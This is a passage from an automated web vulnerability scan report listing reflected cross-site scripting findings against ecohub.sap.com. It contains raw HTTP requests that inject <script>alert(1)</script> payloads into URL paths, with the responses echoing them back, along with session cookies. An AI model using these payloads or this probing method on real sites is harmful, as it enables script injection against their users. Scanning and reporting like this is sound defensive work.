Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690493228%3B%20pe%3Dno%2520value%7C1318690493231%3B%20c3%3Dscn%253Ablog%253Acategory%253Asap%2520teched%7C1318690493233%3B%20s_nr%3D1318688693239-New%7C1321280693239%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292293242%3B%20s_visit%3D1%7C1318690493243%3B%20gpv_p47%3Dno%2520value%7C1318690493245%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B; VisitID=QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==; Unique=QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==; ; SDNSTATE=1834225836.14340.0000; rack.session=BAh7BzoLdXNlcklkIgA6EGRpc3BsYXlOYW1lIgA%3D%0A--e9bcbd9b38efcc777ce9632a16fe98ce5215ed13

Response

HTTP/1.1 404 Not Found
Server: SAP LJS 1.0.0
X-Cascade: pass
Cache-Control: max-age=31536000, public
Expires: Wed, 10 Oct 2012 08:40:08 GMT
SDN_VISIT: QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==
SDN_GUID: QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==
Content-Type: text/plain
Content-Length: 72
Date: Sat, 15 Oct 2011 14:25:32 GMT
Connection: close

File not found: /img/empty.giff16e8<script>alert(1)</script>8de76daedec
3.16. http://ecohub.sap.com/js/ecohub.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecohub.sap.com
Path:   /js/ecohub.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 78724<script>alert(1)</script>6627191e19f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js78724<script>alert(1)</script>6627191e19f/ecohub.js?1318315094 HTTP/1.1
Host: ecohub.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://ecohub.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690493228%3B%20pe%3Dno%2520value%7C1318690493231%3B%20c3%3Dscn%253Ablog%253Acategory%253Asap%2520teched%7C1318690493233%3B%20s_nr%3D1318688693239-New%7C1321280693239%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292293242%3B%20s_visit%3D1%7C1318690493243%3B%20gpv_p47%3Dno%2520value%7C1318690493245%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B; rack.session=BAh7BzoLdXNlcklkIgA6EGRpc3BsYXlOYW1lIgA%3D%0A--e9bcbd9b38efcc777ce9632a16fe98ce5215ed13; VisitID=QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==; Unique=QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==; ; SDNSTATE=1834225836.14340.0000

Response

HTTP/1.1 404 Not Found
Server: SAP LJS 1.0.0
X-Cascade: pass
SDN_VISIT: QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==
SDN_GUID: QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==
Content-Type: text/plain
Content-Length: 71
Cache-Control: public, max-age=86400
Expires: Sun, 16 Oct 2011 14:25:18 GMT
Date: Sat, 15 Oct 2011 14:25:18 GMT
Connection: close

File not found: /js78724<script>alert(1)</script>6627191e19f/ecohub.js
3.17. http://ecohub.sap.com/js/ecohub.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecohub.sap.com
Path:   /js/ecohub.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9726b<script>alert(1)</script>f1d958d7d40 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/ecohub.js9726b<script>alert(1)</script>f1d958d7d40?1318315094 HTTP/1.1
Host: ecohub.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://ecohub.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690493228%3B%20pe%3Dno%2520value%7C1318690493231%3B%20c3%3Dscn%253Ablog%253Acategory%253Asap%2520teched%7C1318690493233%3B%20s_nr%3D1318688693239-New%7C1321280693239%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292293242%3B%20s_visit%3D1%7C1318690493243%3B%20gpv_p47%3Dno%2520value%7C1318690493245%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B; rack.session=BAh7BzoLdXNlcklkIgA6EGRpc3BsYXlOYW1lIgA%3D%0A--e9bcbd9b38efcc777ce9632a16fe98ce5215ed13; VisitID=QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==; Unique=QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==; ; SDNSTATE=1834225836.14340.0000

Response

HTTP/1.1 404 Not Found
Server: SAP LJS 1.0.0
X-Cascade: pass
Cache-Control: max-age=31536000, public
Expires: Wed, 10 Oct 2012 08:40:08 GMT
SDN_VISIT: QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==
SDN_GUID: QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==
Content-Type: text/plain
Content-Length: 71
Date: Sat, 15 Oct 2011 14:25:25 GMT
Connection: close

File not found: /js/ecohub.js9726b<script>alert(1)</script>f1d958d7d40
3.18. http://ecohub.sap.com/js/jquery-1.5.2.min.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecohub.sap.com
Path:   /js/jquery-1.5.2.min.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c11ea<script>alert(1)</script>3d8d2c650a5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsc11ea<script>alert(1)</script>3d8d2c650a5/jquery-1.5.2.min.js?1318315094 HTTP/1.1
Host: ecohub.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://ecohub.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690493228%3B%20pe%3Dno%2520value%7C1318690493231%3B%20c3%3Dscn%253Ablog%253Acategory%253Asap%2520teched%7C1318690493233%3B%20s_nr%3D1318688693239-New%7C1321280693239%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292293242%3B%20s_visit%3D1%7C1318690493243%3B%20gpv_p47%3Dno%2520value%7C1318690493245%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B; rack.session=BAh7BzoLdXNlcklkIgA6EGRpc3BsYXlOYW1lIgA%3D%0A--e9bcbd9b38efcc777ce9632a16fe98ce5215ed13; VisitID=QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==; Unique=QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==; ; SDNSTATE=1834225836.14340.0000

Response

HTTP/1.1 404 Not Found
Server: SAP LJS 1.0.0
X-Cascade: pass
SDN_VISIT: QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==
SDN_GUID: QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==
Content-Type: text/plain
Content-Length: 81
Cache-Control: public, max-age=86362
Expires: Sun, 16 Oct 2011 14:24:44 GMT
Date: Sat, 15 Oct 2011 14:25:22 GMT
Connection: close

File not found: /jsc11ea<script>alert(1)</script>3d8d2c650a5/jquery-1.5.2.min.js
3.19. http://ecohub.sap.com/js/jquery-1.5.2.min.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecohub.sap.com
Path:   /js/jquery-1.5.2.min.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d00b2<script>alert(1)</script>2a60a99c87 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/jquery-1.5.2.min.jsd00b2<script>alert(1)</script>2a60a99c87?1318315094 HTTP/1.1
Host: ecohub.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://ecohub.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690493228%3B%20pe%3Dno%2520value%7C1318690493231%3B%20c3%3Dscn%253Ablog%253Acategory%253Asap%2520teched%7C1318690493233%3B%20s_nr%3D1318688693239-New%7C1321280693239%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292293242%3B%20s_visit%3D1%7C1318690493243%3B%20gpv_p47%3Dno%2520value%7C1318690493245%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B; rack.session=BAh7BzoLdXNlcklkIgA6EGRpc3BsYXlOYW1lIgA%3D%0A--e9bcbd9b38efcc777ce9632a16fe98ce5215ed13; VisitID=QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==; Unique=QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==; ; SDNSTATE=1834225836.14340.0000

Response

HTTP/1.1 404 Not Found
Server: SAP LJS 1.0.0
X-Cascade: pass
Cache-Control: max-age=31536000, public
Expires: Wed, 10 Oct 2012 08:40:08 GMT
SDN_VISIT: QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==
SDN_GUID: QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==
Content-Type: text/plain
Content-Length: 80
Date: Sat, 15 Oct 2011 14:25:29 GMT
Connection: close

File not found: /js/jquery-1.5.2.min.jsd00b2<script>alert(1)</script>2a60a99c87
3.20. http://ecohub.sap.com/stylesheets/style.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecohub.sap.com
Path:   /stylesheets/style.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 813b4<script>alert(1)</script>b80a639f654 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /stylesheets813b4<script>alert(1)</script>b80a639f654/style.css?1318315094 HTTP/1.1
Host: ecohub.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://ecohub.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690493228%3B%20pe%3Dno%2520value%7C1318690493231%3B%20c3%3Dscn%253Ablog%253Acategory%253Asap%2520teched%7C1318690493233%3B%20s_nr%3D1318688693239-New%7C1321280693239%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292293242%3B%20s_visit%3D1%7C1318690493243%3B%20gpv_p47%3Dno%2520value%7C1318690493245%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B; rack.session=BAh7BzoLdXNlcklkIgA6EGRpc3BsYXlOYW1lIgA%3D%0A--e9bcbd9b38efcc777ce9632a16fe98ce5215ed13; VisitID=QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==; Unique=QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==; ; SDNSTATE=1834225836.14340.0000

Response

HTTP/1.1 404 Not Found
Server: SAP LJS 1.0.0
X-Cascade: pass
SDN_VISIT: QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==
SDN_GUID: QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==
Content-Type: text/plain
Content-Length: 80
Cache-Control: public, max-age=86400
Expires: Sun, 16 Oct 2011 14:25:22 GMT
Date: Sat, 15 Oct 2011 14:25:22 GMT
Connection: close

File not found: /stylesheets813b4<script>alert(1)</script>b80a639f654/style.css
3.21. http://ecohub.sap.com/stylesheets/style.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecohub.sap.com
Path:   /stylesheets/style.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 13b92<script>alert(1)</script>2192398d55f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /stylesheets/style.css13b92<script>alert(1)</script>2192398d55f?1318315094 HTTP/1.1
Host: ecohub.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://ecohub.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690493228%3B%20pe%3Dno%2520value%7C1318690493231%3B%20c3%3Dscn%253Ablog%253Acategory%253Asap%2520teched%7C1318690493233%3B%20s_nr%3D1318688693239-New%7C1321280693239%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292293242%3B%20s_visit%3D1%7C1318690493243%3B%20gpv_p47%3Dno%2520value%7C1318690493245%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B; rack.session=BAh7BzoLdXNlcklkIgA6EGRpc3BsYXlOYW1lIgA%3D%0A--e9bcbd9b38efcc777ce9632a16fe98ce5215ed13; VisitID=QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==; Unique=QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==; ; SDNSTATE=1834225836.14340.0000

Response

HTTP/1.1 404 Not Found
Server: SAP LJS 1.0.0
X-Cascade: pass
Cache-Control: max-age=31536000, public
Expires: Wed, 10 Oct 2012 08:40:08 GMT
SDN_VISIT: QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==
SDN_GUID: QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==
Content-Type: text/plain
Content-Length: 80
Date: Sat, 15 Oct 2011 14:25:29 GMT
Connection: close

File not found: /stylesheets/style.css13b92<script>alert(1)</script>2192398d55f
3.22. http://ecohub.sap.com/stylesheets813b4%3Cscript%3Ealert(1)%3C/script%3Eb80a639f654/style.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://ecohub.sap.com
Path:   /stylesheets813b4%3Cscript%3Ealert(1)%3C/script%3Eb80a639f654/style.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a1b69(a)5c9dcb45dbc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /stylesheets813b4%3Cscript%3Ealert(1)%3Ca1b69(a)5c9dcb45dbc/script%3Eb80a639f654/style.css?1318315094 HTTP/1.1
Host: ecohub.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://ecohub.sap.com/stylesheets813b4%3Cscript%3Ealert(1)%3C/script%3Eb80a639f654/style.css?1318315094
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; session=144fe053-5592-4145-8a61-c484bd4d3e8b; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapvirtualevents.com%2fteched%2fdefault.aspx%3f433fe%27%3balert(document.location)%2f%2ffea0f539288; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 404 Not Found
Server: SAP LJS 1.0.0
X-Cascade: pass
SDN_VISIT: QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==
SDN_GUID: QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==
Content-Type: text/plain
Content-Length: 99
Cache-Control: public, max-age=86356
Expires: Sun, 16 Oct 2011 15:28:23 GMT
Date: Sat, 15 Oct 2011 15:29:07 GMT
Connection: close

File not found: /stylesheets813b4<script>alert(1)<a1b69(a)5c9dcb45dbc/script>b80a639f654/style.css
3.23. http://ecohub.sap.com/stylesheets813b4%3Cscript%3Ealert(1)%3C/script%3Eb80a639f654/style.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://ecohub.sap.com
Path:   /stylesheets813b4%3Cscript%3Ealert(1)%3C/script%3Eb80a639f654/style.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 97de3(a)c7cf365f0d3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /stylesheets813b4%3Cscript%3Ealert(1)%3C/97de3(a)c7cf365f0d3/style.css?1318315094 HTTP/1.1
Host: ecohub.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://ecohub.sap.com/stylesheets813b4%3Cscript%3Ealert(1)%3C/script%3Eb80a639f654/style.css?1318315094
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; session=144fe053-5592-4145-8a61-c484bd4d3e8b; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapvirtualevents.com%2fteched%2fdefault.aspx%3f433fe%27%3balert(document.location)%2f%2ffea0f539288; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 404 Not Found
Server: SAP LJS 1.0.0
X-Cascade: pass
SDN_VISIT: QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==
SDN_GUID: QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==
Content-Type: text/plain
Content-Length: 81
Cache-Control: public, max-age=86383
Expires: Sun, 16 Oct 2011 15:28:53 GMT
Date: Sat, 15 Oct 2011 15:29:10 GMT
Connection: close

File not found: /stylesheets813b4<script>alert(1)</97de3(a)c7cf365f0d3/style.css
3.24. http://ecohub.sap.com/stylesheets813b4%3Cscript%3Ealert(1)%3C/script%3Eb80a639f654/style.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecohub.sap.com
Path:   /stylesheets813b4%3Cscript%3Ealert(1)%3C/script%3Eb80a639f654/style.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3df4c<script>alert(1)</script>54d7771a769 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /stylesheets813b4%3Cscript%3Ealert(1)%3C/script%3Eb80a639f6543df4c<script>alert(1)</script>54d7771a769/style.css?1318315094 HTTP/1.1
Host: ecohub.sap.com
Proxy-Connection: keep-alive
